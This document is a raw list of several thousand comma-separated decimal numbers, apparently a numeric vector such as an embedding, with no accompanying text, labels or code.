-0.0018092013197019696, -0.009116584435105324, -0.01466640830039978, 0.006734153721481562, -0.025105034932494164, 0.034841328859329224, -0.011808868497610092, -0.034813784062862396, -0.012635145336389542, 0.0033223202917724848, -0.012029209174215794, 0.013096483424305916, 0.0033860125113278627, 0.001099119894206524, 0.01589205302298069, 0.015134631656110287, -0.018591221421957016, -0.00873787421733141, -0.02631690725684166, -0.01388833113014698, -0.004368937108665705, -0.030104009434580803, -0.01175378356128931, -0.0010147708235308528, 0.012924342416226864, -0.015354972332715988, -0.00013125747500453144, -0.0124974325299263, 0.03836677223443985, 0.015286115929484367, 0.017200322821736336, -0.004410251043736935, -0.023218370974063873, 0.00473387585952878, 0.008882473222911358, 0.029470529407262802, 0.027955690398812294, -0.011333759874105453, -0.003074437379837036, 0.057949528098106384, 0.019417498260736465, 0.014693951234221458, 0.02869933843612671, -0.018260711804032326, 0.04225027561187744, -0.012256435118615627, -0.010714052245020866, -0.027928147464990616, 0.003670044941827655, -0.013874560594558716, 0.0173104926943779, 0.00598361948505044, 0.01919715851545334, 0.024416470900177956, 0.024471556767821312, 0.015120861120522022, -0.007918483577668667, -0.009591693058609962, -0.013151568360626698, 0.01466640830039978, -0.014790349639952183, 0.02546308934688568, -0.002862703986465931, 0.01261448860168457, 0.0015570148825645447, -0.002349723828956485, 0.0005973290535621345, 0.015189717523753643, -0.03495149686932564, -0.054479166865348816, 0.0037698866799473763, 0.017696090042591095, -0.01704883947968483, -0.008710332214832306, 0.026399536058306694, 0.00369070190936327, 0.007760114036500454, 0.007546659093350172, -0.02628936618566513, -0.013791932724416256, -0.023328540846705437, 0.024154817685484886, -0.01596090942621231, 0.006858095061033964, -0.0037664438132196665, 0.0054327682591974735, -0.011815754696726799, 0.01674587093293667, 0.028451455757021904, 0.04602360352873802, -0.00477518979460001, 0.0006868423661217093, -0.008317850530147552, 0.019486354663968086, -0.0421125628054142, 0.009082156233489513, 0.013571592047810555, -0.00407974049448967, 0.00550506729632616, -0.024485327303409576, 0.016442902386188507, 0.036824390292167664, 0.013151568360626698, -0.005498182028532028, -0.02029886096715927, 0.009887776337563992, -0.015423828735947609, 0.011437044478952885, 0.012290863320231438, 0.005405225791037083, -0.017916429787874222, 0.023287227377295494, 0.03376716747879982, -0.015244802460074425, 0.01704883947968483, 0.001800594269298017, -0.024540413171052933, 0.000274779973551631, 0.0019365856423974037, 0.006379543337970972, 0.0163878183811903, 0.015699254348874092, -0.011609185487031937, -0.009894661605358124, 0.025669658556580544, 0.01711769588291645, -0.025531945750117302, -0.0006231502047739923, -0.022695062682032585, 0.02301180176436901, 0.006582669913768768, 0.00011232196993660182, 0.013674876652657986, 0.000007961518349475227, -0.0014149985508993268, -0.00014631979865953326, 0.02396201901137829, -0.00032470087171532214, -0.038421858102083206, -0.004365494474768639, 0.02619296684861183, 0.007718800101429224, -0.0007070689462125301, 0.0016516923205927014, -0.032059527933597565, -0.007030236069113016, 0.013075826689600945, 0.013185996562242508, 0.018453508615493774, 0.006148874759674072, 0.02386562153697014, -0.021042509004473686, -0.02416858822107315, -0.0003266374405939132, -0.02516012080013752, -0.014432297088205814, -0.021896328777074814, -0.010700280778110027, 0.010762251913547516, 0.011512786149978638, -0.007849627174437046, 0.0015931644011288881, 0.007980454713106155, -0.002389316214248538, -0.022901631891727448, -0.010638310573995113, -0.02058805711567402, 0.010514369234442711, -0.019816866144537926, 0.003275842173025012, 0.012993198819458485, 0.006031818687915802, -0.02867179550230503, -0.00822833739221096, 0.014556238427758217, -0.006059361156076193, -0.02902984991669655, 0.03610828518867493, 0.028396369889378548, -0.009626121260225773, 0.029608242213726044, 0.018494823947548866, 0.01963783986866474, -0.0022447179071605206, 0.02409973181784153, 0.026606105268001556, -0.03935830667614937, -0.003098536981269717, 0.002187911421060562, -0.017585918307304382, -0.009956632740795612, -0.01827448233962059, 0.001759280450642109, -0.012676458805799484, -0.009949746541678905, 0.025876227766275406, 0.0061660888604819775, 0.008462448604404926, -0.001374545507133007, 0.009984174743294716, -0.002415137365460396, -0.012745315209031105, 0.0109412781894207, 0.005742622073739767, -0.000308562652207911, -0.0007707611075602472, -0.006765139289200306, -0.011017020791769028, 0.03619091212749481, -0.015162174589931965, -0.003096815664321184, -0.01857745088636875, 0.014652637764811516, -0.007787656504660845, 0.010769137181341648, 0.021441876888275146, -0.004792403895407915, 0.02952561527490616, 0.003167393384501338, -0.0019624067936092615, -0.0219789557158947, -0.0007281561847776175, -0.0004000125336460769, -0.009309382177889347, 0.05131177231669426, -0.0164842177182436, -0.025531945750117302, 0.001656856620684266, 0.01105833426117897, 0.028313742950558662, -0.006231502164155245, 0.022199297323822975, -0.011898382566869259, -0.02108382247388363, 0.01193281076848507, 0.008861815556883812, -0.029415445402264595, -0.008944443427026272, -0.0023686594795435667, -0.03002138063311577, 0.04963167756795883, 0.0018419080879539251, -0.008786073885858059, -0.0037182443775236607, -0.04426088184118271, -0.0007612933404743671, 0.013523392379283905, 0.005315712187439203, 0.003231085604056716, 0.0002285171067342162, 0.019513897597789764, -0.00882050208747387, -0.019059445708990097, 0.008531305007636547, 0.009529722854495049, -0.022488493472337723, 0.020009662955999374, -0.001267818035557866, 0.011244246736168861, 0.012490547262132168, 0.024485327303409576, 0.04516978561878204, 0.0006575784063898027, -0.03412522003054619, 0.0035702032037079334, -0.0006515535060316324, -0.019045675173401833, 0.013055169023573399, -0.022956715896725655, 0.01024582888931036, 0.008007996715605259, 0.009151012636721134, -0.002380709396675229, 0.0037113588768988848, -0.035337094217538834, -0.0002470222534611821, 0.018990589305758476, 0.015947137027978897, -0.010066802613437176, -0.007002693600952625, 0.0024788295850157738, -0.053983401507139206, -0.015781881287693977, -0.0027249911800026894, 0.01612616330385208, 0.02374167926609516, -0.0060387044213712215, 0.0008000250672921538, -0.03814643248915672, 0.010486826300621033, -0.006334786769002676, 0.03767821192741394, 0.011499015614390373, 0.009743177331984043, -0.006975151132792234, 0.010404198430478573, 0.011822639964520931, -0.023548880591988564, 0.008558847941458225, -0.03674176335334778, 0.019775552675127983, 0.003732015611603856, 0.005023072939366102, -0.008331621997058392, 0.0062108454294502735, 0.006940722931176424, -0.003096815664321184, 0.023851849138736725, -0.019624067470431328, 0.00590099161490798, -0.0060249329544603825, -0.003341255709528923, 0.013964073732495308, -0.0045100930146873, -0.000846933457069099, -0.013709304854273796, 0.01029402855783701, 0.017434434965252876, -0.009688092395663261, 0.0002017276710830629, 0.011388844810426235, -0.011581642553210258, -0.0008744759834371507, 0.009488409385085106, -0.009206097573041916, -0.0019658496603369713, 0.011402616277337074, 0.01591959409415722, -0.01388833113014698, 0.0029263959731906652, 0.018949275836348534, 0.012917456217110157, -0.00590099161490798, 0.0006812477950006723, -0.007808313239365816, 0.026495933532714844, -0.012311520054936409, -0.013055169023573399, 0.03765066713094711, 0.004093511495739222, -0.0038490714505314827, 0.009798262268304825, -0.008407363668084145, -0.03338157385587692, 0.0064587281085550785, -0.01843973807990551, 0.006231502164155245, -0.005494738928973675, -0.01388833113014698, 0.01837088167667389, 0.0163878183811903, 0.02714318409562111, 0.023755449801683426, -0.004028098192065954, 0.0344281904399395, -0.006982036866247654, 0.004561734851449728, -0.026509705930948257, 0.011664270423352718, 0.024251217022538185, -0.012339062988758087, -0.015713024884462357, 0.011712470091879368, 0.011726241558790207, 0.006441514007747173, -0.0013943416997790337, -0.0035667603369802237, 0.016924897208809853, -0.018026599660515785, 0.02403087541460991, -0.006049032788723707, -0.008951329626142979, -0.028754424303770065, -0.04076297581195831, -0.002034706063568592, 0.01036288496106863, 0.0024616154842078686, 0.005959519650787115, -0.021028738468885422, 0.011925924569368362, -0.02075331285595894, -0.038256604224443436, -0.026275593787431717, 0.013606020249426365, 0.007202377077192068, 0.005842463579028845, -0.015465142205357552, -0.025738514959812164, -0.021565817296504974, 0.009281840175390244, 0.008572619408369064, 0.007718800101429224, -0.007050893269479275, 0.021014966070652008, 0.016415361315011978, -0.03294089064002037, -0.028754424303770065, 0.008104396052658558, -0.012277091853320599, 0.00884115882217884, -0.018357111141085625, -0.008813616819679737, -0.004978316370397806, -0.019486354663968086, -0.00888935849070549, -0.02258489280939102, 0.013048283755779266, -0.017324265092611313, 0.01655307412147522, 0.011437044478952885, 0.010851765051484108, -0.0022223396226763725, 0.01579565368592739, 0.001559596974402666, -0.011829526163637638, 0.003935141954571009, 0.001170558389276266, -0.016277648508548737, -0.0029694312252104282, 0.008786073885858059, -0.03126079589128494, 0.022571120411157608, 0.004899131134152412, 0.014735264703631401, -0.004224339034408331, 0.0009880890138447285, 0.013833246193826199, -0.0036975874099880457, -0.01678718440234661, 0.014542466960847378, -0.002776633482426405, 0.018715163692831993, 0.0064277430064976215, 0.0010345671325922012, -0.022488493472337723, -0.026027711108326912, -0.01625010557472706, -0.0060696895234286785, -0.018233168870210648, 0.02065691351890564, -0.002447844250127673, -0.00955037958920002, 0.0011774441227316856, -0.006778910290449858, 0.0023789878468960524, 0.0016301748109981418, -0.0032224785536527634, 0.00806308165192604, 0.0068925232626497746, -0.007013021968305111, -0.00014094040670897812, -0.00831096526235342, -0.015107089653611183, 0.020808396860957146, 0.018687620759010315, 0.008744760416448116, 0.031866732984781265, 0.0009898104472085834, -0.015465142205357552, 0.0180403720587492, -0.011726241558790207, 0.00811128132045269, 0.0018264154205098748, -0.0009622678626328707, 0.0005994808161631227, -0.020147375762462616, 0.026826445013284683, 0.007946026511490345, -0.015368743799626827, 0.006799567490816116, -0.0034669185988605022, -0.006568898446857929, 0.002842047018930316, -0.0012531861430034041, 0.007346975617110729, -0.0019796208944171667, -0.00955037958920002, -0.031040456146001816, 0.0011283839121460915, 0.007044007536023855, 0.018398424610495567, 0.0005237388540990651, -0.018522365018725395, -0.0015682040248066187, 0.016704557463526726, 0.011347531341016293, 0.0011232197284698486, -0.018315795809030533, -0.00628314446657896, 0.004916345234960318, 0.0057219648733735085, -0.008180137723684311, -0.009874004870653152, -0.009901546873152256, -0.0015871395589783788, 0.019748009741306305, -0.020106062293052673, 0.002475386718288064, -0.020464114844799042, 0.004014326725155115, -0.016594387590885162, 0.0041795819997787476, 0.018288254737854004, 0.009199212305247784, -0.00804242491722107, 0.004682233557105064, -0.012759086675941944, -0.014377212151885033, 0.005880334880203009, -0.0017196880653500557, 0.0012600717600435019, 0.0019847850780934095, -0.02062937058508396, -0.0009476359118707478, 0.008131938055157661, 0.024870924651622772, -0.006231502164155245, -0.013709304854273796, 0.023617736995220184, -0.00122306146658957, -0.017172779887914658, 0.02763894945383072, 0.01234594825655222, 0.007312547415494919, 0.018357111141085625, -0.0060696895234286785, 0.0021793043706566095, 0.004706333391368389, -0.015134631656110287, 0.015313658863306046, 0.004441236611455679, 0.0016783742466941476, 0.011065220460295677, 0.0010466169333085418, -0.009612350724637508, 0.013303052634000778, -0.024209903553128242, 0.0031966574024409056, -0.000149117098771967, 0.007718800101429224, 0.016277648508548737, -0.011037677526473999, -0.00407974049448967, -0.0031983787193894386, -0.016635701060295105, 0.010115002281963825, -0.010321571491658688, -0.005618680268526077, -0.018095456063747406, 0.017489520832896233, 0.022102897986769676, -0.018233168870210648, 0.0067616961896419525, -0.0044068084098398685, -0.018054142594337463, -0.022557349875569344, -0.009116584435105324, -0.0025580143555998802, 0.00372857297770679, 0.002014049096032977, 0.014790349639952183, -0.005188328213989735, -0.007395174819976091, 0.0032207570038735867, 0.010665852576494217, 0.021235307678580284, 0.0025459646712988615, -0.030186636373400688, -0.006727267988026142, 0.022337008267641068, -0.014390982687473297, -0.002675070194527507, 0.008600161410868168, -0.007890940643846989, -0.010073687881231308, -0.0011628121137619019, -0.010369770228862762, -0.019844409078359604, -0.029718412086367607, 0.012332177720963955, 0.03098537027835846, 0.0018728935392573476, 0.007773885037750006, 0.00035353447310626507, 0.02463681250810623, 0.018246939405798912, -0.019940806552767754, 0.020808396860957146, -0.0028058975003659725, 0.02204781211912632, 0.011430159211158752, 0.027074327692389488, 0.01028025709092617, 0.0004837160522583872, 0.05525035783648491, 0.010596996173262596, -0.025022407993674278, 0.025476859882473946, -0.006926951464265585, -0.008503763005137444, -0.0007118028006516397, -0.02320460043847561, 0.013895217329263687, -0.016566844657063484, 0.01273154467344284, 0.029470529407262802, 0.005026515573263168, -0.013771275989711285, -0.00021162578195799142, 0.008352278731763363, 0.008434906601905823, -0.00046435018884949386, -0.008297193795442581, -0.002776633482426405, -0.012896799482405186, 0.012889914214611053, -0.015175946056842804, 0.0004424022336024791, -0.0048715886659920216, 0.024292530491948128, 0.008510648272931576, -0.027267126366496086, 0.014859206043183804, 0.0034376545809209347, 0.013488964177668095, 0.009963518008589745, 0.013723076321184635, 0.013213538564741611, 0.016401588916778564, -0.0015027904883027077, 0.002425465965643525, -0.019954578951001167, 0.03398750722408295, -0.022819003090262413, -0.008221451193094254, -0.005659994203597307, 0.0029367245733737946, -0.003583974437788129, -0.0037802152801305056, 0.01466640830039978, -0.00310714403167367, -0.004575506318360567, 0.010004831477999687, 0.0014141378924250603, -0.011457701213657856, -0.0021620902698487043, -0.008007996715605259, -0.005408668424934149, 0.011512786149978638, -0.007147292140871286, -0.013234196230769157, -0.007257462479174137, -0.00399711262434721, 0.005147014278918505, -0.026537248864769936, -0.01714523881673813, -0.004069412127137184, 0.00819390919059515, 0.010748480446636677, -0.005133242812007666, -0.0004893106524832547, 0.021014966070652008, 0.02029886096715927, -0.00450320728123188, 0.011595414020121098, 0.015162174589931965, -0.004499764181673527, 0.022157981991767883, -0.003924813587218523, 0.01747574843466282, -0.021331705152988434, -0.01695244014263153, -0.011326874606311321, -0.00515734264627099, 0.019417498260736465, 0.012056752108037472, -0.01747574843466282, 0.0014244663761928678, 0.012228893116116524, 0.02221306785941124, -0.007828970439732075, 0.020767083391547203, 0.0006205681129358709, 0.003573646070435643, 0.005405225791037083, -0.008235222660005093, -0.020050978288054466, -0.016924897208809853, -0.015547770075500011, 0.0023135743103921413, 0.01867385022342205, 0.008338507264852524, 0.0005551545764319599, -0.00001775203418219462, -0.014363440684974194, 0.004751089960336685, -0.008304079063236713, -0.007663714699447155, 0.012642031535506248, 0.03241758421063423, -0.015313658863306046, 0.001905600307509303, -0.005811478476971388, -0.0007531166193075478, 0.010369770228862762, -0.038284145295619965, 0.008861815556883812, -0.01820562593638897, 0.022860318422317505, -0.0037423442117869854, -0.0008335925522260368, -0.008669017814099789, -0.01009434461593628, 0.013991615734994411, -0.004778632428497076, -0.005233084782958031, -0.005212428048253059, -0.00581836374476552, -0.027583865448832512, -0.014335897751152515, 0.031067997217178345, 0.021331705152988434, 0.017696090042591095, 0.003274120856076479, 0.0006950190872885287, -0.0012970820534974337, 0.0024409585166722536, -0.02473321184515953, -0.006920066196471453, 0.00015869243361521512, -0.00446877907961607, 0.015809424221515656, 0.015079546719789505, 0.002168976003304124, -0.02737729623913765, 0.009777605533599854, -0.02350756712257862, 0.01678718440234661, -0.01801282912492752, -0.007560430560261011, 0.0020915125496685505, -0.007154177874326706, 0.010431741364300251, 0.022653749212622643, -0.003583974437788129, -0.0017102203564718366, 0.0056909797713160515, 0.0007006136584095657, -0.004661576822400093, -0.0034944612998515368, 0.015947137027978897, -0.017723631113767624, -0.009722520597279072, -0.016139935702085495, 0.009116584435105324, -0.0081457095220685, 0.0068167815916240215, 0.00562900910153985, -0.017572147771716118, -0.006527584511786699, -0.016828499734401703, -0.0028558182530105114, 0.008138824254274368, 0.00877230241894722, 0.015671711415052414, 0.0011783047812059522, 0.011402616277337074, -0.000027677036996465176, 0.013895217329263687, 0.001580253941938281, 0.014473610557615757, -0.030241722241044044, 0.004210567567497492, 0.008248994126915932, -0.013330594636499882, -0.020835939794778824, 0.005449982360005379, 0.01347519364207983, -0.009281840175390244, 0.0008378960774280131, 0.0014408197021111846, 0.003268956672400236, -0.02324591390788555, 0.008366050198674202, -0.013062055222690105, 0.006844324059784412, -0.006982036866247654, 0.010011717677116394, 0.005191770847886801, 0.0037974293809384108, -0.004885360132902861, 0.0013633562484756112, -0.0014554517110809684, 0.0062556019984185696, -0.008001111447811127, 0.00737451808527112, -0.030076466500759125, -0.02115267887711525, 0.00512291444465518, -0.025339147076010704, -0.023328540846705437, 0.0038938282523304224, 0.0082421088591218, 0.015010690316557884, -0.013874560594558716, 0.02039525844156742, 0.006799567490816116, 0.00025756590184755623, -0.011822639964520931, 0.0038284147158265114, 0.006090346723794937, -0.006648083217442036, 0.004751089960336685, 0.025201434269547462, -0.00021646723325829953, -0.003886942518875003, -0.021841242909431458, -0.026895301416516304, -0.012146265245974064, 0.009522837586700916, 0.016139935702085495, -0.000867590366397053, -0.027790434658527374, -0.01817808300256729, -0.0090201860293746, -0.012738429941236973, 0.00729877594858408, -0.03065485879778862, -0.012876142747700214, 0.001497626188211143, -0.0009812033968046308, 0.00562900910153985, 0.025807371363043785, -0.02075331285595894, -0.003470361465588212, -0.00279729044996202, 0.0028110616840422153, -0.012118722312152386, 0.016442902386188507, 0.004585834685713053, 0.00819390919059515, -0.018852876499295235, -0.002576950006186962, 0.02230946719646454, -0.007828970439732075, -0.0016835384303703904, 0.01976178027689457, -0.010252715088427067, -0.009226754307746887, -0.004902574233710766, 0.006259044632315636, -0.009102812968194485, 0.03046206198632717, 0.02237832359969616, -0.0037113588768988848, 0.0015466863987967372, 0.01109276246279478, 0.00826276559382677, 0.006510370410978794, 0.006875309161841869, -0.005666879937052727, 0.014039815403521061, 0.008083738386631012, 0.01744820550084114, 0.01031468529254198, -0.02436138689517975, -0.022763919085264206, -0.017393121495842934, -0.01400538720190525, 0.004172696731984615, 0.006083460990339518, -0.015602855011820793, 0.011664270423352718, 0.021565817296504974, -0.00884115882217884, -0.0233423113822937, -0.007622401230037212, -0.012187578715384007, 0.009915318340063095, 0.01645667478442192, 0.005023072939366102, 0.009061499498784542, -0.01021140068769455, 0.00868967454880476, 0.0008107838802970946, 0.016415361315011978, -0.01392275933176279, -0.01168492715805769, -0.007897826842963696, -0.007629286497831345, 0.013199768029153347, 0.006620540749281645, 0.025173891335725784, -0.03159130737185478, -0.002124219201505184, -0.012910570949316025, -0.018246939405798912, -0.006317572668194771, -0.000852528028190136, -0.0120360953733325, -0.006259044632315636, 0.006620540749281645, -0.006579226814210415, -0.029057390987873077, -0.02108382247388363, -0.0037630011793226004, 0.002299803076311946, 0.003100258531048894, -0.00900641456246376, 0.016401588916778564, 0.005312269553542137, -0.032527752220630646, -0.007126634940505028, -0.0066756256856024265, 0.003625288372859359, -0.007057779002934694, -0.008779188618063927, 0.017861343920230865, -0.023493796586990356, -0.0016448067035526037, -0.00734008988365531, 0.009281840175390244, 0.006964822765439749, -0.017393121495842934, -0.0082421088591218, -0.035337094217538834, -0.01049371249973774, -0.012910570949316025, 0.020119834691286087, 0.0016120999353006482, 0.0029832026921212673, -0.008648361079394817, -0.006861538160592318, -0.01853613741695881, -0.008916901424527168, -0.00885493028908968, -0.021001195535063744, -0.005384568590670824, -0.006424299906939268, -0.011416387744247913, -0.004544520750641823, -0.04062526300549507, -0.014294584281742573, -0.0014769693370908499, -0.027721578255295753, -0.000466501951450482, -0.004527306649833918, 0.001432212651707232, -0.010824223048985004, -0.004582392051815987, -0.01032845675945282, 0.017902659252285957, -0.01262826006859541, 0.017406892031431198, 0.000012211248758831061, -0.01539628580212593, -0.008910015225410461, 0.012160036712884903, -0.009839576669037342, -0.00802865345031023, -0.0180403720587492, -0.007760114036500454, 0.0008051892509683967, -0.0179439727216959, -0.00042927649337798357, -0.0002797290508169681, 0.03869728371500969, 0.006895966362208128, -0.0030055809766054153, -0.002365216612815857, 0.0005056640366092324, -0.02277768962085247, -0.01943127065896988, 0.008517534472048283, -0.0056496658362448215, -0.01764100417494774, -0.0003505219938233495, -0.026771359145641327, -0.006858095061033964, 0.023094428703188896, -0.006300358567386866, -0.011251132003962994, -0.026509705930948257, -0.022557349875569344, -0.008021768182516098, 0.0028299971017986536, -0.014046701602637768, 0.00147352647036314, 0.0037974293809384108, 0.013110254891216755, -0.001548407832160592, -0.01196723897010088, 0.00589410588145256, 0.0020088849123567343, -0.007705028634518385, 0.0071059782058000565, 0.0311230830848217, -0.003270677989348769, 0.028781965374946594, 0.011347531341016293, -0.01817808300256729, -0.012986312620341778, 0.0027215483132749796, 0.0008374656899832189, 0.005033401306718588, 0.0018419080879539251, 0.015423828735947609, -0.0008667296497151256, 0.020023435354232788, -0.0014184414176270366, 0.034345559775829315, -0.009915318340063095, -0.024981094524264336, 0.0039179278537631035, -0.011443929746747017, 0.02697792835533619, -0.0028678681701421738, -0.0013848738744854927, 0.0011524836299940944, -0.0022481607738882303, -0.015713024884462357, 0.004455007612705231, -0.008455563336610794, 0.016346504911780357, 0.0010767416097223759, -0.020973652601242065, -0.004575506318360567, -0.009274953976273537, 0.027088100090622902, 0.012786629609763622, 0.006851209793239832, 0.006654968950897455, 0.004682233557105064, 0.008379821665585041, -0.0020656913984566927, 0.004692562390118837, -0.010115002281963825, 0.010893079452216625, -0.012676458805799484, -0.014129328541457653, -0.006107560824602842, 0.007801427505910397, 0.0008934115176089108, 0.009874004870653152, -0.008290307596325874, 0.016897356137633324, 0.011705583892762661, 0.01952766813337803, 0.02056051418185234, -0.01724163629114628, 0.014542466960847378, 0.013881445862352848, -0.027831748127937317, 0.004940445069223642, -0.018963046371936798, -0.0014804120874032378, 0.0408456027507782, -0.004244995769113302, -0.010321571491658688, -0.00617297412827611, 0.00745026022195816, 0.026922844350337982, -0.0082421088591218, 0.0002937154786195606, -0.0006851209909655154, -0.009832690469920635, 0.01417064294219017, 0.001800594269298017, 0.0008839437505230308, 0.011361302807927132, -0.008985757827758789, 0.006035261787474155, -0.014528695493936539, -0.016139935702085495, -0.004547963850200176, -0.008407363668084145, -0.0209598820656538, 0.0056049092672765255, -0.02400333434343338, -0.003979898523539305, -0.02980104088783264, 0.014115558005869389, -0.0019572426099330187, -0.0037044731434434652, -0.0140535868704319, -0.008269650861620903, -0.017599690705537796, 0.03002138063311577, -0.026743818074464798, -0.007436488755047321, -0.0009614072041586041, -0.01098947785794735, 0.021565817296504974, 0.012283978052437305, -0.015107089653611183, 0.021772386506199837, -0.011499015614390373, -0.012249549850821495, 0.005026515573263168, -0.008744760416448116, -0.025008637458086014, 0.020174918696284294, -0.001993392128497362, 0.0028489327523857355, 0.006868423894047737, -0.015134631656110287, -0.015313658863306046, -0.009309382177889347, -0.009984174743294716, -0.030048923566937447, 0.015065775252878666, -0.009984174743294716, -0.018095456063747406, 0.0031777217518538237, 0.00882050208747387, -0.015699254348874092, -0.0037492297124117613, 0.01843973807990551, -0.012228893116116524, 0.015768110752105713, 0.006376100704073906, -0.016539301723241806, 0.011161618866026402, 0.005067829508334398, -0.009302496910095215, -0.01697998307645321, 0.03255529701709747, -0.01180198322981596, -0.000018034454114967957, -0.010734708979725838, -0.0003182455839123577, -0.01830202527344227, 0.016677014529705048, 0.024058418348431587, 0.013957187533378601, 0.006537913344800472, -0.015244802460074425, -0.026096567511558533, -0.019775552675127983, 0.005870006047189236, -0.010500597767531872, -0.004995530471205711, -0.002778354799374938, 0.0090201860293746, -0.014335897751152515, 0.0062556019984185696, -0.006262487731873989, 0.012814171612262726, 0.0068167815916240215, 0.002449565567076206, -0.004926674067974091, 0.012042980641126633, 0.02539423294365406, 0.014156871475279331, -0.015905823558568954, 0.0020054420456290245, -0.002886803587898612, 0.007842741906642914, -0.004107282962650061, 0.0109412781894207, -0.02532537654042244, -0.0062521593645215034, -0.0034187191631644964, -0.020271318033337593, 0.021841242909431458, -0.016442902386188507, 0.009137241169810295, 0.009474637918174267, 0.014198184944689274, -0.011994780972599983, 0.02168975956737995, -0.00110686628613621, -0.00014588945487048477, 0.0011731405975297093, 0.0018987146904692054, 0.008710332214832306, -0.01541005726903677, -0.0012523253681138158, -0.0008650082745589316, 0.003838743083178997, 0.006882194895297289, -0.008834273554384708, -0.01045928429812193, 0.009178555570542812, -0.00822833739221096, -0.005666879937052727, -0.0064587281085550785, 0.019142072647809982, 0.011877724900841713, 0.009770720265805721, -0.02360396645963192, 0.007133520673960447, 0.013847017660737038, 0.012283978052437305, -0.01582319661974907, 0.006785796023905277, -0.004203681834042072, -0.011588528752326965, -0.01655307412147522, -0.004627148620784283, -0.003122636815533042, -0.006169531494379044, -0.006482827942818403, 0.002735319547355175, 0.012903685681521893, -0.02588999830186367, -0.0040487549267709255, 0.012132493779063225, 0.028781965374946594, -0.00660332664847374, 0.02360396645963192, -0.007092207204550505, -0.008958214893937111, -0.01669078692793846, 0.006148874759674072, 0.0055635953322052956, -0.02185501530766487, -0.009336925111711025, 0.01549268513917923, 0.0071954913437366486, 0.010087459348142147, 0.002514979336410761, -0.012118722312152386, -0.008531305007636547, 0.005752950441092253, -0.01195346750319004, -0.0072368052788078785, 0.0014236056013032794, -0.011994780972599983, -0.012063637375831604, 0.01397095900028944, 0.009233640506863594, -0.00026767916278913617, 0.016208792105317116, -0.0004467057588044554, 0.0067169396206736565, -0.00403842655941844, -0.026358220726251602, -0.007684371899813414, -0.002978038275614381, 0.016002222895622253, 0.002229225356131792, -0.01129244640469551, -0.019018132239580154, 0.010665852576494217, 0.0019658496603369713, -0.009557264856994152, 0.007560430560261011, 0.019982121884822845, 0.007939140312373638, 0.05078846588730812, -0.00032749815727584064, -0.00407285476103425, -0.026275593787431717, 0.007013021968305111, 0.005659994203597307, -0.013667991384863853, 0.008517534472048283, -0.004702890757471323, 0.007567315828055143, 0.01474903617054224, 0.018026599660515785, -0.021138908341526985, 0.021028738468885422, -0.00006799567199777812, -0.0038525143172591925, -0.015506456606090069, 0.005921648349612951, 0.008944443427026272, 0.004382708575576544, 0.0061557600274682045, 0.012807286344468594, -0.01843973807990551, -0.014156871475279331, -0.004864702932536602, -0.021441876888275146, -0.006262487731873989, 0.004269095603376627, -0.013482078909873962, 0.0203264020383358, 0.009151012636721134, 0.03508920967578888, -0.016401588916778564, 0.01582319661974907, 0.021634673699736595, -0.03489641100168228, -0.04753844439983368, -0.01342699397355318, -0.004375822842121124, 0.005060943774878979, -0.007243691012263298, 0.01688358373939991, 0.002299803076311946, 0.00003066260615014471, 0.004943888168781996, 0.005009301472455263, 0.0008882472757250071, -0.01258006040006876, -0.003670044941827655, -0.005233084782958031, -0.01466640830039978, -0.009481523185968399, 0.0031054227147251368, -0.012208235450088978, 0.0009571036789566278, -0.014074243605136871, 0.026922844350337982, 0.02124907821416855, 0.014776579104363918, -0.004272538237273693, -0.014583781361579895, -0.0013547491980716586, -0.019555211067199707, -0.006362329237163067, 0.004424022510647774, 0.0039007137529551983, -0.004967987537384033, 0.005071272142231464, -0.018067913129925728, 0.001703334623016417, 0.023149514570832253, -0.0030555017292499542, 0.005739178974181414, 0.010714052245020866, 0.004021212458610535, 0.011333759874105453, 0.004685676656663418, 0.0024116947315633297, 0.03126079589128494, 0.00741583202034235, -0.002471944084390998, 0.007312547415494919, -0.030544688925147057, 0.00795979704707861, 0.01608484983444214, -0.020271318033337593, -0.011533443816006184, 0.007167948875576258, -0.043847743421792984, 0.01024582888931036, 0.001086209318600595, -0.03181164711713791, -0.0101632010191679, 0.009646778926253319, -0.005759836174547672, -0.02690907195210457, 0.0007931393920443952, -0.005718522239476442, 0.02476075291633606, -0.0054740821942687035, -0.03340911492705345, -0.0000031805730031919666, 0.002972874091938138, 0.004682233557105064, -0.008386706933379173, -0.022295694798231125, 0.013468307442963123, 0.012511203996837139, -0.003194935852661729, 0.00030318324570544064, -0.0016981704393401742, -0.018164312466979027, 0.024154817685484886, -0.006138545926660299, -0.0021827472373843193, -0.003993669990450144, -0.007849627174437046, 0.02230946719646454, 0.008510648272931576, 0.0037113588768988848, -0.006613655015826225, -0.002890246454626322, -0.012752201408147812, -0.009874004870653152, 0.00024594637216068804, -0.0015793931670486927, 0.015423828735947609, -0.0188666470348835, 0.007006136700510979, -0.0005938862450420856, -0.003535775002092123, 0.018990589305758476, 0.008965100161731243, 0.004241553135216236, 0.004096954595297575, -0.00897198636084795, -0.01397095900028944, -0.002341116778552532, 0.009316268377006054, -0.013757504522800446, -0.005718522239476442, 0.024650583043694496, -0.0032723993062973022, 0.005264070350676775, -0.013165339827537537, -0.0018539580050855875, 0.016566844657063484, 0.024388929829001427, -0.01039731316268444, 0.005284727085381746, -0.025380460545420647, 0.010631424374878407, 0.02062937058508396, -0.00550506729632616, -0.013495850376784801, -0.0011671156389638782, -0.004592720419168472, 0.001180026214569807, -0.0006442375015467405, -0.007050893269479275, 0.007464031223207712, -0.024416470900177956, 0.008441791869699955, 0.003935141954571009, -0.01398473046720028, 0.027005471289157867, 0.016732100397348404, 0.024375157430768013, 0.037623126059770584, -0.012146265245974064, 0.010610767640173435, 0.014198184944689274, 0.011705583892762661, 0.006090346723794937, -0.008848045021295547, -0.008834273554384708, -0.01622256264090538, 0.007622401230037212, 0.0008830830338411033, 0.010080574080348015, 0.018026599660515785, -0.0008710331749171019, -0.0030882086139172316, 0.017902659252285957, 0.003344698576256633, -0.003227642737329006, 0.007250576745718718, 0.0050127445720136166, 0.00904084276407957, -0.0005994808161631227, 0.02718449756503105, -0.0023686594795435667, 0.019816866144537926, -0.0117193553596735, 0.019885722547769547, -0.027074327692389488, -0.01966538093984127, -0.022667519748210907, 0.006665297318249941, -0.001969292527064681, -0.0076706004329025745, 0.0039626844227313995, -0.005739178974181414, 0.007519116625189781, -0.02525652013719082, -0.005267512984573841, -0.015368743799626827, 0.006434628739953041, 0.0022051255218684673, 0.0012850321363657713, 0.009075270965695381, 0.009956632740795612, 0.000531054800376296, 0.012125608511269093, 0.00978449173271656, -0.006486271042376757, 0.01658061519265175, 0.012160036712884903, -0.038779910653829575, -0.03963373228907585, -0.028313742950558662, -0.0018969932571053505, -0.025022407993674278, -0.00795979704707861, 